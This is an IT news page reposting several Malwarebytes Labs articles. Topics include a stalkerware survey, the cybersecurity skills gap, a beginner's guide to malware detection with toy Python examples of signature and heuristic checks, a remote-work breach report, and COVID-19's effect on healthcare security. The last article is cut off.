IT News

Explore the MakoLogics IT News for valuable insights and thought leadership on industry best practices in managed IT services and enterprise security updates.

Good news: Stalkerware survey results show majority of people aren’t creepy

Back in July, we sent out a survey to Malwarebytes Labs readers on the subject of stalkerware—the term used to describe apps that can potentially invade someone’s privacy. We asked one question: “Have you ever used an app to monitor your partner’s phone?” 

The results were reassuring.

We received 4,578 responses from readers all over the world to our stalkerware survey and the answer was a resounding “NO.” An overwhelming 98.23 percent of respondents said they had not used an app to monitor their partner’s phone.

[Chart: responses to survey question 1]

For our part, Malwarebytes takes stalkerware seriously. We’ve been detecting apps with monitoring capabilities for more than six years—now Malwarebytes for Windows, Mac, or Android detects and allows users to block applications that attempt to monitor your online behavior and/or physical whereabouts without your knowledge or consent. Last year, we helped co-found the Coalition Against Stalkerware with the Electronic Frontier Foundation, the National Network to End Domestic Violence, and several other AV vendors and advocacy groups.

It stands to reason that a readership comprised of Malwarebytes customers and people with a strong interest in cybersecurity would say “no” to stalkerware—we’ve spoken up about the potential privacy concerns associated with using these apps and the danger of equipping software with high-grade surveillance capabilities for a long time. We didn’t want to assume everyone agreed with us, but the data from our stalkerware survey shows our instincts were right.

No to stalkerware

Beyond a simple yes or no, we also asked our survey-takers to explain why they answered the way they did. The most common answer by far was mutual respect and trust for their partner. In fact, “respect,” “trust,” and “privacy” were the three words our participants used most often in their responses:

“My partner and I share our lives … To monitor someone else’s phone is a tragic lack of trust.”

Many of those surveyed cited the Golden Rule (treat others the way you want to be treated) as their reason for not using stalkerware-type apps:

“I wouldn’t want anyone to monitor me so I therefore I would not monitor them.”

Others saw it as a clear-cut issue of ethics:

“People are entitled to their privacy as long as they do not do things that are illegal. Their rights end at the beginning of mine.”

Some respondents shared harrowing real-life accounts of being a victim of stalkerware or otherwise having their privacy violated:

“I have been a victim of stalking several times when vicious criminals used my own surveillance cameras to spy on my activity then used it to break into my apartment.”

Stalkerware vs. location sharing vs. parental monitoring

Many of those surveyed, answering either yes or no, made a distinction between stalkerware-type apps writ large and location-sharing apps like Apple’s Find My iPhone and Google Maps. Location sharing was generally considered acceptable because users volunteered to share their own information and sharing was limited to their current location.

“My wife & myself allow Apple Find My Phone to track each other if required. I was keen that should I not arrive home from a run, she could find out where I was in the case of a health issue or accident.”

Also considered okay by our respondents were the types of parental controls packaged in by default with their various devices. Many respondents specifically mentioned tracking their child’s location:

“It would not be ok with me if someone was monitoring me and I would never do it to anyone else, the only thing I would like is be able to track my child if kidnapped.”

Some parents admitted to using monitoring of some kind with their children, but it wasn’t clear how far they were willing to go and if children were aware they were being monitored:

“The only reason I have set up parental control for my son is for his safety most importantly.”

This is the murky world of parental-monitoring apps. On one end of the spectrum there are the first-party parental controls like those built into the iPhone and Nintendo Switch. These controls allow parents to restrict screen time and approve games and additional content on an ad hoc basis. Then there are third-party apps, which provide limited capabilities to track one thing and one thing only, like, say, a child’s location, or their screen time, or the websites they are visiting.

On the other end of the spectrum, there are apps in the same parental monitoring category that provide a far broader range of monitoring, from tracking all of a child’s interactions on social media to using a keylogger that might even reveal online searches meant to stay private.

You can hear more about our take on these apps in our latest podcast episode, but the long and the short of it is that Malwarebytes doesn’t recommend them, as they can feature many of the same high-tech surveillance capabilities as nation-state malware and stalkerware, but often lack basic cybersecurity and privacy measures.

Who said ‘yes’ to stalkerware?

Of course, our stalkerware survey analysis would not be complete without taking a look at the 81 responses from those who said “yes” to using apps to monitor their partners’ phone.

Again, the majority of respondents made a distinction between consensual location-sharing apps and the more intrusive types of monitoring that stalkerware can provide. Many of those who answered “yes” to using an app to monitor their partner’s phone said things like:

“My wife and I have both enabled Google’s location sharing service. It can be useful if we need to know where each other is.”

And:

“Only the Find My iPhone app. My wife is out running or hiking by herself quite often and she knows I want to know if she is safe.”

Of the 81 people who said they use apps to monitor their partners’ phones, only nine cited issues of trust, cheating, “being lied to” or “change in partner’s behavior.” Of those nine, two said their partner agreed to install the app.
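As a quick sanity check, the two headline figures are internally consistent (assuming every respondent answered one way or the other, which the survey question implies):

```python
# Cross-check the survey numbers reported above: 4,578 total responses,
# 81 "yes" answers, and a reported 98.23 percent "no" rate.
total_responses = 4578
yes_responses = 81

no_responses = total_responses - yes_responses          # 4,497 "no" answers
pct_no = round(100 * no_responses / total_responses, 2)

print(no_responses, pct_no)  # 4497 98.23 — matching the reported figure
```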

NortonLifeLock’s online creeping study

The results of the Labs stalkerware survey are especially interesting when compared to the Online Creeping Survey conducted by NortonLifeLock, another founding member of the Coalition Against Stalkerware.

This survey of more than 2,000 adults in the United States found that 46 percent of respondents admitted to “stalking” an ex or current partner online “by checking in on them without their knowledge or consent.”

Twenty-nine percent of those surveyed admitted to checking a current or former partner’s phone. Twenty-one percent admitted to looking through a partner’s search history on one of their devices without permission. Nine percent admitted to creating a fake social media profile to check in on their partners.

When compared to the Labs stalkerware survey, it would seem that online stalking is considered more acceptable when couched under the term “checking in.” For perspective, if one were to swap the word “diary” for “phone,” we don’t think too many people would feel comfortable admitting, “Hey, I’m just ‘checking in’ on my girlfriend/wife’s diary. No big deal.”

Stalkerware in a pandemic

Finally, we can’t end this piece without at least acknowledging the strange and scary times we’re living in. Shelter-in-place orders at the start of the coronavirus pandemic became de facto jail sentences for stalkerware and domestic violence victims, imprisoning them with their abusers. No surprise, The New York Times reported an increase in the number of domestic violence victims seeking help since March.

For some users, however, the pandemic has brought on a different kind of suffering. One survey respondent best summed up the current malaise of anxiety, fear, and depression: 

“No partner to monitor lol.”

We like to think, dear reader, that they’re not laughing at themselves and the challenges of finding a partner during COVID. Rather, they’re laughing at all of us.

Stalkerware resources

As mentioned earlier, Malwarebytes for Windows, Mac, or Android will detect and let users remove stalkerware-type applications. And if you think you might have stalkerware on your mobile device, be sure to check out our article on what to do when you find stalkerware or suspect you’re the victim of stalkerware.

Here are a few other important reads on stalkerware:

Stalkerware and online stalking are accepted by Americans. Why?

Stalkerware’s legal enforcement problem

Awareness of stalkerware, monitoring apps, and spyware on the rise

How to protect against stalkerware

The post Good news: Stalkerware survey results show majority of people aren’t creepy appeared first on Malwarebytes Labs.

The cybersecurity skills gap is misunderstood

Nearly every year, a trade association, a university, an independent researcher, or a large corporation—and sometimes all of them and many in between—push out the latest research on the cybersecurity skills gap, the now decade-old idea that the global economy faces a large and growing shortage of cybersecurity professionals.

It is, as one report said, a “state of emergency.” It would be nice, then, if the numbers made more sense.

In 2010, according to one study focused on the United States, the cybersecurity skills gap included at least 10,000 individuals. In 2015, according to a separate analysis, that number was 209,000. Also, in 2015, according to yet another report, that number was more than 1 million. Today, that number is both a projected 3.5 million by 2021 and a current 4.07 million, worldwide.

PK Agarwal, dean of the University of California Santa Cruz Silicon Valley Extension, has followed these numbers for years. He followed the data in personal interest, and he followed it more deeply when building programs at Northeastern University Silicon Valley, the educational hub opened by the private Boston-based university, where he most recently served as regional dean and CEO. During his research, he uncovered something.

“In terms of actual numbers, if you’re looking at the supply and demand gap in cybersecurity, you’ll see tons of reports,” Agarwal said. “They’ll be all over the map.”

He continued: “Yes, there is a shortage, but it is not a systemic shortage. It is in certain sweet spots. That’s the reality. That’s the actual truth.”

Like Agarwal said, there are “sweet spots” of truth to the cybersecurity skills gap—there can be difficulties in finding immediate need on deadline-driven projects, or in finding professionals trained in a crucial software tool that a company cannot spend time training current employees on.

But more broadly, the cybersecurity skills gap, according to recruiters, hiring managers, and academics, is misunderstood. Rather than a lack of talent, there is sometimes, on behalf of companies, a lack of understanding in how to find and hire that talent.

By posting overly restrictive job requirements, demanding contradictory skillsets, refusing to hire remote workers, offering non-competitive rates, and failing to see minorities, women, and veterans as viable candidates, businesses could miss out on the very real, very accessible cybersecurity talent out there.

In other words, if you are not able to find a cybersecurity expert for your company, that doesn’t mean they don’t exist. It means you might need help in finding them.

Number games

In 2010, the Center for Strategic & International Studies (CSIS) released its report “A Human Capital Crisis in Cybersecurity.” According to the paper, “the cyber threat to the United States affects all aspects of society, business, and government, but there is neither a broad cadre of cyber experts nor an established cyber career field to build upon, particularly within the Federal government.”

Further, according to Jim Gosler, a then-visiting NSA scientist and the founding director of the CIA’s Clandestine Information Technology Office, only 1,000 security experts were available in the US with the “specialized skills to operate effectively in cyberspace.” The country, Gosler said in interviews, needed 10,000 to 30,000.

Though the cybersecurity skills gap was likely spotted before 2010, the CSIS paper partly captures a theory that draws support today—the skills gap is a lack of talent.

Years later, the cybersecurity skills gap reportedly grew into a chasm. It would soon span the world.  

In 2016, the Enterprise Strategy Group called the cybersecurity skills gap a “state of emergency,” publishing research showing that 46 percent of senior IT and cybersecurity professionals at midmarket and enterprise companies described their departments’ lack of cybersecurity skills as “problematic.” The same year, separate data compiled by the professional IT association ISACA predicted that the entire world would be short 2 million cybersecurity professionals by the year 2019.

But by 2019, that prediction had already come true, according to a survey published that year by the International Information System Security Certification Consortium, or (ISC)2. The world, the group said, employed 2.8 million cybersecurity professionals, but it needed 4.07 million.

At the same time, a recent study projected that the skills gap in 2021 would be lower than the (ISC)2 estimate for today—instead predicting a need of 3.5 million professionals by next year. Throughout the years, separate studies have offered similarly conflicting numbers.

The variation can be dizzying, but it can be explained by a variation in motivations, said Agarwal. He said these reports do not exist in a vacuum, but are rather drawn up for companies and, perhaps unsurprisingly, for major universities, which rely on this data to help create new programs and to develop curriculum to attract current and prospective students.

It’s a path Agarwal went down years ago when developing a Master’s program in computer science at Northeastern University Silicon Valley. The data, he said, supported the program, showing some 14,000 Bay Area jobs that listed a Master’s degree as a requirement, while neighboring Bay Area schools were on track to produce fewer than 500 Master’s graduates that year.

“There was a massive gap, so we launched the campus,” Agarwal said. The program garnered interest, but not as much as the data suggested.

Agarwal remembered thinking at the time: “What the hell is going on?” 

It turns out, a lot was going on, Agarwal said. For many students, the prospect of more student debt for a potentially higher pay was not enough to get them into the program. Further, the salaries for Bachelor’s graduates and Master’s graduates were close enough that students had a difficult time seeing the value in getting the advanced degree.

That wariness toward a Master’s degree in computer science also plagues cybersecurity education today, Agarwal said, comparing it to an advanced degree in Biology.

“Cybersecurity at the Master’s level is about the same as in Biology—it has no market value,” Agarwal said. “If you have a BA [in Biology], you’re a lab rat. If you have an MA, you’re a senior lab rat.”

So, imagine the confusion for cybersecurity candidates who, when applying for jobs, find Master’s degrees listed as requirements. And yet, that is far from uncommon. The requirement, like many others, can drive candidates away.

Searching different

For companies that feel like the cybersecurity talent they need simply does not exist, recruiters and strategists have different advice: Look for cybersecurity talent in a different way. That means more lenient degree and certification requirements, more openness to working remotely, and hiring for the aptitude of a candidate, rather than going down a must-have wish list.

Jim Johnson, senior vice president and Chief Technology Officer for the international recruiting agency Robert Half, said that, when he thinks about client needs in cybersecurity, he often recalls a conference panel he watched years ago. A panel of hiring experts, Johnson said, was asked a simple question: How do you find people?

One person, Johnson recalled, said “You need to be okay hiring people who know nothing.”

The lesson, Johnson said, was that companies should hire for aptitude and the ability to learn.

“You hire the personality that fits what you’re looking for,” Johnson said. “If they don’t have everything technically, but they’re a shoo-in for being able to learn it, that’s the person you bring up.”

Johnson also explained that, for some candidates, restrictive job requirements can actually scare them away. Johnson’s advice for companies is that they understand what they’re looking for, but they don’t make the requirements for the job itself so restrictive that it causes hesitation for some potential candidates.

“You might miss a great hire because you required three certifications and they had one, or they’re in the process of getting one,” Johnson said.

Similarly, Thomas Kranz, a longtime cybersecurity consultant and current cybersecurity strategy adviser for organizations, called degree-specific job requirements “the biggest barrier companies face when trying to hire cybersecurity talent.”

“This is an attitude that belongs firmly in the last century,” Kranz wrote. “‘Must have a [Bachelor of Science] or advanced degree’ goes hand in hand with ‘Why can’t we find the candidates we need?’”

This thinking has caught on beyond the world of recruiters.

In February, more than a dozen companies, including Malwarebytes, pledged to adopt the Aspen Institute’s “Principles for Growing and Sustaining the Nation’s Cybersecurity Workforce.”

The very first principle requires companies to “widen the aperture of candidate pipelines, including expanding recruitment focus beyond applicants with four-year degrees or using non-gender biased job descriptions.”

At Malwarebytes, the practice of removing strict degree requirements from cybersecurity job descriptions has been in place for cybersecurity hires for at least a year and a half.

“I will never list a BA or BS as a hard requirement for most positions,” said Malwarebytes Chief Information Security Officer John Donovan. “Work and life experience help to round out candidates, especially for cyber-security roles.” Donovan added that, for more junior positions, there are “creative ways to broaden the applicant pool,” such as using the recruiting programs YearUp, NPower, and others.

The two organizations, like many others, help transition individuals to tech-focused careers, offering training classes, internships, and access to a corporate world that was perhaps beyond reach.

These types of career development groups can also help a company looking to broaden its search to include typically overlooked communities, including minorities, women, disabled people, and veterans.

Take, for example, the International Consortium of Minority Cybersecurity Professionals, which creates opportunities for women and minorities to advance in the field, or the nonprofit Women in CyberSecurity (WiCyS), which recently developed a veterans’ program. WiCyS primarily works to cultivate the careers of women in cybersecurity by offering training sessions, providing mentorship, granting scholarships, and working with interested corporate partners.

“In cybersecurity, there are challenges that have never existed before,” said Lynn Dohm, executive director for WiCyS. “We need multitasking, diversity of thought, and people from all different backgrounds, all genders, and all ethnicities to tackle these challenges from all different perspectives.”

Finally, for companies still having trouble finding cybersecurity talent, Robert Half’s Johnson recommended broadening the search—literally. Cybersecurity jobs no longer need to be filled by someone located within a 40-mile radius, he said, and if anything, the current pandemic has reinforced this idea.

“The effect of the pandemic, which has shifted how people do their jobs, has made us now realize that the whole working remote thing isn’t as scary as we thought,” Johnson said.

But companies should understand that remote work is as much a boon to them as it is to potential candidates. No longer are qualified candidates limited in their search by what they can physically get to—now, they can apply for more appealing jobs much farther from where they live.

And that, of course, will have an impact on salary, Johnson said.

“While Bay Area salaries or a New York salary, while those might not change dramatically, what is changing is the folks that might be being recruited in Des Moines or in Omaha or Oklahoma City, who have traditionally been limited [regionally], now they’re being recruited by companies on the coast,” Johnson said.

“That’s affecting local companies, which are paying those $80,000 salaries. Now those candidates are being offered $85,000 to work remotely. Now I’ve got to compete with that.”

Planning ahead

The cybersecurity skills gap need not frighten a company or a senior cybersecurity manager looking to hire. There are many actionable steps that a business can take today to help broaden their search and find the talent that perhaps other companies are ignoring.

First, stop including hard degree requirements in job descriptions. The same goes for cybersecurity certifications. Second, start accepting the idea of remote work for these teams. The value of “butts in seats” means next to nothing right now, so get used to it. Third, understand that remote work means potentially better pay for the candidates you’re trying to hire, so look at the market data and pay appropriately. Fourth, connect with a recruiting organization, like WiCyS, if you want some extra help in creating a diverse and representative team. Fifth, consider looking inward, as your next cybersecurity hire might actually be a cybersecurity promotion.

And the last piece of advice, at least according to Robert Half’s Johnson? Hire a recruiter.

The post The cybersecurity skills gap is misunderstood appeared first on Malwarebytes Labs.

A week in security (August 17 – 23)

Last week on Malwarebytes Labs, we looked at the impact of COVID-19 on healthcare cybersecurity, dug into some pandemic stats in terms of how workforces coped with going remote, and served up a crash course on malware detection. Our most recent Lock and Code podcast explored the safety of parental monitoring apps.

Other cybersecurity news

Stay safe, everyone!

The post A week in security (August 17 – 23) appeared first on Malwarebytes Labs.

‘Just tell me how to fix my computer:’ a crash course on malware detection

Malware. You’ve heard the term before, and you know it’s bad for your computer—like a computer virus. Which begs the question: Do the terms “malware” and “computer virus” mean the same thing? How do you know if your computer is infected with malware? Is “malware detection” just a fancy phrase for antivirus? For that matter, are anti-malware and antivirus programs the same? And let’s not forget about Apple and Android users, who are probably wondering if they need cybersecurity software at all.

This is the point where your head explodes.

All you want to do is get your work done, Zoom your friends/family, Instacart a bottle of wine, and stream a movie till you go to bed. But it’s during these everyday tasks that we let our guard down and are most susceptible to malware, which includes such cyberthreats as ransomware, Trojans, spyware, stalkerware, and, yes, viruses.

To add insult to injury, cybercriminals deliver malware using sneaky social engineering tricks, such as fooling people into opening email attachments that infect their computers or asking them to update their personal information on malicious websites pretending to be legitimate. Sounds awful, right? It sure is!

The good news is that staying safe online is actually fairly easy. All it takes is a little common sense, a basic understanding of how threats work, and a security program that can detect and protect against malware. Think of it like street smarts but for the Internet. With these three elements, you can safely avoid the majority of the dangers online today.

So, for the Luddites and the technologically challenged among our readership, this is your crash course on malware detection. In this article, we’ll answer all the questions you wish you didn’t have to ask like:

  • What is malware?
  • How can I detect malware?
  • Is Windows Defender good enough?
  • Do Mac and mobile devices need anti-malware?
  • How do you remove malware?
  • How do you prevent malware infections?

What is malware?

Malware, or “malicious software,” is a catchall term that refers to any malicious program that is harmful to your devices. Targets for malware can include your laptop, tablet, mobile phone, and WiFi router. Even household items like smart TVs, smart fridges, and newer cars with lots of onboard technology can be vulnerable. Put it this way: If it connects to the Internet, there’s a chance it could be infected with malware.

There are many types of malware, but here’s a gloss on the more infamous and/or popular examples in rotation today.

Adware

Adware, or advertising-supported software, is software that displays unwanted advertising on your computer or mobile device. As stated in the Malwarebytes Labs 2020 State of Malware Report, adware is the most common threat to Windows, Mac, and Android devices today.

While it may not be considered as dangerous as some other forms of malware, such as ransomware, adware has become increasingly aggressive and malicious over the last couple of years, redirecting users from their online searches to advertising-supported results, adding unnecessary toolbars to browsers, peppering screens with hard-to-close pop-up ads, and making itself difficult for users to uninstall.

Computer virus

A computer virus is a form of malware that attaches itself to another program (such as a document) and can replicate and spread on its own once a person first executes it on a system. But computer viruses aren’t as prevalent as they once were. Cybercriminals today tend to focus their efforts on more lucrative threats like ransomware.

Trojan

A Trojan is a program that hides its true intentions, often appearing legitimate but actually conducting malicious business. There are many families of malware that can be considered Trojans, from information-stealers to banking Trojans that siphon off account credentials and money.

Once active on a system, a Trojan can quietly steal your personal info, spam other potential victims from your account, or even load other forms of malware. One of the more effective Trojans on the market today is called Emotet, which has evolved from a basic info-stealer to a tool for spreading other forms of malware to other systems—especially within business networks.

Ransomware

Ransomware is a type of malware that locks you out of your device and/or encrypts your files, then forces you to pay a ransom to get them back. Many high-profile attacks against businesses, schools, and local government agencies over the last four years have included ransomware of some kind. Some of the more notorious recent strains of ransomware include Ryuk, Sodinokibi, and WastedLocker.

How can I detect malware?

There are a few ways to spot malware on your device. It may be running slower than usual. You may have loads of ads bombarding your screen. Your files may be frozen or your battery life may drain faster than usual. Or there may be no sign of infection at all.

That’s why good malware detection starts with a good anti-malware program. For our purposes, “good” anti-malware is going to be a program that can detect and protect against any of the threats we’ve covered above and then some, including what’s known as zero-day or zero-hour exploits. These are new threats developed by cybercriminals to exploit vulnerabilities, or weaknesses in code, that have not yet been detected or fixed by the company that created them. (That’s why when companies do fix these vulnerabilities, they issue patches, or updates, and notify users immediately.)

Antivirus and other legacy cybersecurity software rely on something called signature-based detection in order to stop threats. Signature-based detection works by comparing every file on your computer against a list of known malware. Each threat carries a signature that functions much like a set of fingerprints. If your security program finds code on your computer that matches the signature of a known threat, it’ll isolate and remove the malicious program.

While signature-based detection can be effective for protecting against known threats, it is time-consuming and resource-intensive for your computer. To continue our fingerprint analogy, signature-based detection can only spot threats with an established rap sheet. Brand-new malware, zero-day, and zero-hour exploits are free to spread and cause damage until security researchers identify the threat and reverse-engineer it, adding its signature to an increasingly bloated database.
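The signature lookup described above can be sketched in a few lines. This is a toy illustration, not how any real AV engine is built: `KNOWN_MALWARE_SIGNATURES` is a made-up stand-in for the signature database, and a file’s SHA-256 hash stands in for its “fingerprint.”

```python
import hashlib

# Toy signature database: hashes of files already known to be malicious.
# Real AV databases hold millions of entries; this set is illustrative
# and starts empty.
KNOWN_MALWARE_SIGNATURES = set()

def sha256_of_file(path):
    """Fingerprint a file, hashing in 64 KB chunks to bound memory use."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()

def is_known_malware(path):
    """Signature-based check: flag a file only if its hash is on the list."""
    return sha256_of_file(path) in KNOWN_MALWARE_SIGNATURES
```

The sketch also shows the limitation discussed above: a brand-new threat whose hash isn’t in the set sails straight past `is_known_malware`, no matter how malicious its behavior is.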

This is where heuristic analysis comes in. Heuristic analysis relies on investigating a program’s behavior to determine whether a bit of computer code is malicious or not. In other words, if a program is acting like malware, it probably is malware. After demonstrating suspicious behavior, files are quarantined and can be manually or automatically removed—without having to add signatures to the database.
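One common way to turn “acting like malware” into a decision is to score observed behaviors and quarantine anything over a threshold. The behavior names, weights, and threshold below are all hypothetical, chosen only to illustrate the idea:

```python
# Hypothetical heuristic scoring: weight suspicious behaviors observed
# while a program runs, and quarantine it once the total crosses a
# threshold. All names and numbers here are illustrative.
SUSPICION_WEIGHTS = {
    "writes_to_startup_folder": 3,
    "disables_security_service": 5,
    "encrypts_many_user_files": 5,
    "installs_keyboard_hook": 4,
    "opens_network_connection": 1,  # common in benign software: low weight
}
QUARANTINE_THRESHOLD = 6

def heuristic_verdict(observed_behaviors):
    """Return a (verdict, score) pair for a list of observed behaviors."""
    score = sum(SUSPICION_WEIGHTS.get(b, 0) for b in observed_behaviors)
    verdict = "quarantine" if score >= QUARANTINE_THRESHOLD else "allow"
    return verdict, score
```

Note that no signature is involved: a never-before-seen program that disables a security service and starts encrypting user files would score 10 and be quarantined on behavior alone.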

The best anti-malware programs, then, can protect against new and emerging zero-day/zero-hour threats using heuristic analysis, as well as threats we already know about using traditional signature-based detection. If your antivirus or anti-malware relies on signature-based malware detection alone to keep your system safe—you’re not really safe.

Is Windows Defender good enough?

Maybe you’re using Windows Defender because your computer came with it preinstalled. It seems fine, but you’ve never looked at other options. Or maybe you have Windows Defender and your computer somehow got an infection anyway. Either way, here’s something to consider: Defender is one of the security programs most targeted by cybercriminals. And there are whole categories of threats that Windows Defender doesn’t protect against.

The majority of threats detected today are found using signature-less technologies, but there are several other methods of malware detection that, when layered together, offer optimal protection over Windows Defender. Malwarebytes Premium, for example, uses a layered approach to threat detection that includes heuristic analysis technology as just one of its components. Other major components include ransomware protection and rollback, web protection, and anti-exploit technology.

Do Mac and mobile devices need anti-malware?

In 2019 for the first time ever, Macs outpaced Windows PCs in number of threats detected per endpoint. Over the last few years, Mac adware has exploded, debunking the myth that Macs are safe from cyberthreats. While Macs’ built-in AV blocks some malware, Mac adware has become so aggressive that it warrants extra anti-malware protection.

Meanwhile, Mac’s mobile counterpart, the iPhone, does not allow outside anti-malware programs to be downloaded. (Apple says its own built-in iOS protection is enough.) However, there are some privacy apps, web browser protection, and scam call blockers users can try for added safety.

As for Android, malware attacks from threats such as adware, monitoring apps, and other potentially unwanted programs (PUPs) are more common. At best, PUPs serve up annoying ads you can’t get rid of. At worst, they’ll discreetly steal information from your phone.

Also, because the Android environment allows for third-party downloads, it’s a bit more vulnerable to malware and PUPs than the iPhone. So we recommend a good anti-malware solution for your Android device as well.

How can I remove malware?

Malware detection is the important first step for any cybersecurity solution. But what happens next? If you get a malware infection on one of your devices, the good news is you can easily remove it. The process of identifying and removing cyberthreats from your computer systems is called “remediation.”

To conduct a thorough remediation of your device, download an anti-malware program and run a scan. Before doing so, make sure you back up your files. Afterwards, change all of your account passwords in case they were compromised in the malware attack. And if you’re dealing with a tough infection, you’re in luck: Malwarebytes has a rock-solid reputation for removing malware that other programs can’t even detect, let alone remove.

If you need to clean an infected computer now, download Malwarebytes for free, review these tips for remediation, and run a scan to see which threats are hiding on your devices.

How do I protect against malware?

Yes, it’s possible to clean up an infected computer and fully remove malware from your system. But the damage from some forms of malware, like ransomware, cannot be undone. If it’s encrypted your files and you haven’t backed them up, the jig is up. So your best defense is to beat the bad guys at their own game—by preventing infection in the first place.

There are a few ways to do this. Keeping all devices updated with the latest software patches will block threats designed to exploit older vulnerabilities. Automating backups of files to an encrypted cloud storage platform won’t protect against ransomware attacks, but it will ensure that you needn’t pay the ransom to retrieve your files. Training on cybersecurity best practices, including how to spot a phishing attack, tech support scam, or other social engineering technique, also helps stave off insider threats.

However, the best way to prevent malware infection is to use an antivirus/anti-malware program with layered protection that stops a wide range of cyberthreats in real time—whether it’s a malicious website or a brand-new malware family never before seen “in the wild.”

But if you have antivirus already and threats are getting through, maybe it’s time to move on to a program that’ll “just fix your computer” so you can stop worrying about malware detection and start…participating in distance learning classes? Ordering groceries? Having your virtual doctor’s appointment? Developing a vaccine? Literally anything else.

The post ‘Just tell me how to fix my computer:’ a crash course on malware detection appeared first on Malwarebytes Labs.

20 percent of organizations experienced breach due to remote worker, Labs report reveals

It is no surprise that moving to a fully remote work environment due to COVID-19 would cause a number of changes in organizations’ approaches to cybersecurity. What has been surprising, however, are some of the unanticipated shifts in employee habits and how they have impacted the security posture of businesses large and small.

Our latest Malwarebytes Labs report, Enduring from Home: COVID-19’s Impact on Business Security, reveals some unexpected data about security concerns with today’s remote workforce.

Our report combines Malwarebytes product telemetry with survey results from 200 IT and cybersecurity decision makers from small businesses to large enterprises, unearthing new security concerns that surfaced after the pandemic forced US businesses to send their workers home.

The data showed that since organizations moved to a work from home (WFH) model, the potential for cyberattacks and breaches has increased. While this isn’t entirely unexpected, the magnitude of this increase is surprising. Since the start of the pandemic, 20 percent of respondents said they faced a security breach as a result of a remote worker. This in turn has increased costs, with 24 percent of respondents saying they paid unexpected expenses to address a cybersecurity breach or malware attack following shelter-in-place orders.

We noticed a stark increase in the use of personal devices for work: 28 percent of respondents admitted they’re using personal devices for work-related activities more than their work-issued devices. Beyond that, we found that 61 percent of respondents’ organizations did not urge employees to use antivirus solutions on their personal devices, further compounding the increase in attack surface with a lack of adequate protection.

We found a startling contrast between the IT leaders’ confidence in their security during the transition to work from home (WFH) environments, and their actual security postures, demonstrating a continued problem of security hubris. Roughly three quarters (73.2 percent) of our survey respondents gave their organizations a score of 7 or above on preparedness for the transition to WFH, yet 45 percent of respondents’ organizations did not perform security and online privacy analyses of necessary software tools for WFH collaboration.

Additional report takeaways

  • 18 percent of respondents admitted that, for their employees, cybersecurity was not a priority, while 5 percent said their employees were a security risk and oblivious to security best practices.
  • At the same time, 44 percent of respondents’ organizations did not provide cybersecurity training that focused on potential threats of working from home (like ensuring home networks had strong passwords, or devices were not left within reach of non-authorized users).
  • While 61 percent of respondents’ organizations provided work-issued devices to employees as needed, 65 percent did not deploy a new antivirus (AV) solution for those same devices.

To learn more about the increasing risks uncovered in today’s remote workforce population, read our full report:

Enduring from Home: COVID-19’s Impact on Business Security

The post 20 percent of organizations experienced breach due to remote worker, Labs report reveals appeared first on Malwarebytes Labs.

The impact of COVID-19 on healthcare cybersecurity

As if stress levels in the healthcare industry weren’t high enough due to the COVID-19 pandemic, risks to its already fragile cybersecurity infrastructure are at an all-time high. From increased cyberattacks to exacerbated vulnerabilities to costly human errors, if healthcare cybersecurity wasn’t circling the drain before, COVID-19 sent it into a tailspin.

No time to shop for a better solution

As a consequence of being too occupied with fighting off the virus, some healthcare organizations have found themselves unable to shop for different security solutions better suited for their current situation.

For example, the Public Health England (PHE) agency, which is responsible for managing the COVID-19 outbreak in England, decided to prolong their existing contract with their main IT provider without allowing competitors to put in an offer. They did this to ensure their main task, monitoring the widespread disease, could go forward without having to worry about service interruptions or other concerns.

Extending a contract without looking at competitors is not only a recipe for getting a bad deal, but it also means organizations are unable to improve on the flaws they may have found in existing systems and software.

Attacks targeting healthcare organizations

Even though there were some early promises of removing healthcare providers as targets after COVID-19 struck, cybercriminals just couldn’t be bothered to do the right thing for once. In fact, we have seen some malware attacks specifically target healthcare organizations since the start of the pandemic.

Hospitals and other healthcare organizations have shifted their focus and resources to their primary role. While this is completely understandable, it has placed them in a vulnerable situation. Throughout the COVID-19 pandemic, an increasing amount of health data is being controlled and stored by the government and healthcare organizations. Reportedly this has driven a rise in targeted, sophisticated cyberattacks designed to take advantage of an increasingly connected environment.

In healthcare, it’s also led to a rise in nation-state attacks, in an effort to steal valuable COVID-19 data and disrupt care operations. In fact, the sector has become both a target of advanced attacks and a vehicle for social engineering. Malicious actors taking advantage of the pandemic have already launched a series of phishing campaigns using COVID-19 as a lure to drop malware or ransomware.

COVID-19 has not only placed healthcare organizations in direct danger of cyberattacks, but some have become victims of collateral damage. There are, for example, COVID-19-themed business email compromise (BEC) attacks that might be aiming for exceptionally rich targets. However, some will settle for less if it is an easy target—like one that might be preoccupied with fighting a global pandemic.

Ransomware attacks

As mentioned before, hospitals and other healthcare organizations run the risk of falling victim to the “spray and pray” attack methods used by some cybercriminals. Ransomware is only one of the possible consequences, but arguably the most disruptive when it comes to healthcare operations—especially those in charge of caring for seriously ill patients.

INTERPOL has issued a warning to organizations at the forefront of the global response to the COVID-19 outbreak about ransomware attacks designed to lock them out of their critical systems in an attempt to extort payments. INTERPOL’s Cybercrime Threat Response team detected a significant increase in the number of attempted ransomware attacks against key organizations and infrastructure engaged in the virus response.

Special COVID-19 facilities

During the pandemic, many countries constructed or refurbished special buildings to house COVID-19 patients. These were created to quickly increase capacity while keeping the COVID patients separate from others. But these ad-hoc COVID-19 medical centers now have a unique set of vulnerabilities: They are remote, they sit outside of a defense-in-depth architecture, and the very nature of their existence means security will be a lower priority. Not only are these facilities likely to have understaffed IT departments, but the biggest possible chunk of their budget is devoted to patient care.

Another point of interest is the transfer of patient data from within the regular hospital setting to these temporary locations. It is clear that the staff working in COVID facilities will need the information about their patients, but how safely is that information being stored and transferred? Is it as protected in the new environment as the old one?

Data theft and protection

A few months ago, when the pandemic proved hard to beat, many agencies reported on targeted efforts by cybercriminals to lift coronavirus research, patient data, and more from the healthcare, pharmaceutical, and research industries. Among these agencies were the National Security Agency, the FBI, the Department of Homeland Security’s Cybersecurity and Infrastructure Security Agency, and the UK’s National Cyber Security Centre.

In the spring, many countries started discussing the use of contact tracing and/or tracking apps, which would warn users if they had been in proximity to an infected person, in an effort to help keep the pandemic under control. Understandably, many privacy concerns were raised by advocates and journalists.

There is so much data being gathered and shared with the intention of fighting COVID-19, but there’s also the need to protect individuals’ personal information. So, several US senators introduced the COVID-19 Consumer Data Protection Act. The legislation would provide all Americans with more transparency, choice, and control over the collection and use of their personal health, device, geolocation, and proximity data. The bill would also hold businesses accountable to consumers if they use personal data to fight the COVID-19 pandemic.

The impact

